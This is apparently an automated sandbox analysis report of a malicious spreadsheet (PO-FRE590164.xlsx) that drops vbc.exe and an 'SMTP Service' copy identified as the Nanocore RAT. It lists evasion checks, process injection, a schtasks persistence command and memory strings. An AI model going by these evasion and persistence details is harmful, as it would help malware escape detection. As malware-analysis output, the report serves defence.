Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Document contains OLE streams with high entropy indicating encrypted embedded content

Source: PO-FRE590164.xlsx

Stream path 'EncryptedPackage' entropy: 7.9999151088 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM_3

Source: Yara match	File source: 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205048820.0000000002164000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170026824.0000000002400000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: vbc.exe, 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Contains long sleeps (>= 3 min)

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 5979			Jump to behavior
Source: C:\Users\Public\vbc.exe	Window / User API: threadDelayed 3785			Jump to behavior
Source: C:\Users\Public\vbc.exe	Window / User API: foregroundWindowGot 899			Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2564	Thread sleep time: -120000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2832	Thread sleep time: -53403s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 912	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2728	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2428	Thread sleep time: -13835058055282155s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2712	Thread sleep time: -51496s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2276	Thread sleep time: -60000s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2228	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2208	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)

Source: smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2169645230.000000000088C000.00000004.00000020.sdmp	Binary or memory string: VMware_S
Source: smtpsvc.exe, 00000009.00000002.2204795580.00000000005E7000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Queries a list of all running processes

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Enables debug privileges

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process token adjusted: Debug			Jump to behavior

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe	Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory written: C:\Program Files (x86)\SMTP Service\smtpsvc.exe base: 400000 value starts with: 4D5A			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmpD9BD.tmp'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\TrXHdHpWh' /XML 'C:\Users\user\AppData\Local\Temp\tmp1334.tmp'			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Process created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe C:\Program Files (x86)\SMTP Service\smtpsvc.exe			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mL
Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*m
Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*m(
Source: vbc.exe, 00000008.00000002.2379944815.0000000000AD0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: vbc.exe, 00000008.00000002.2379944815.0000000000AD0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mt
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mP
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*m|
Source: vbc.exe, 00000008.00000002.2379944815.0000000000AD0000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000008.00000002.2382954157.000000000620E000.00000004.00000001.sdmp	Binary or memory string: \Program Managerh
Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mhX
Source: vbc.exe, 00000008.00000002.2380128377.00000000021E2000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mX
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mdb@
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*m8
Source: vbc.exe, 00000008.00000002.2382914608.0000000005F2E000.00000004.00000001.sdmp	Binary or memory string: \Program Manager
Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mD
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*m$
Source: vbc.exe, 00000008.00000002.2380040977.0000000002102000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mt!
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*mLVH
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*m`
Source: vbc.exe, 00000008.00000002.2380180059.0000000002278000.00000004.00000001.sdmp	Binary or memory string: Program Manager48*m@

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\vbc.exe	Queries volume information: C:\Users\Public\vbc.exe VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Queries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Source: Yara match	File source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY
Source: Yara match	File source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Source: vbc.exe, 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: vbc.exe, 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: vbc.exe, 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: smtpsvc.exe, 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: smtpsvc.exe, 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: smtpsvc.exe, 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Source: Yara match	File source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY
Source: Yara match	File source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE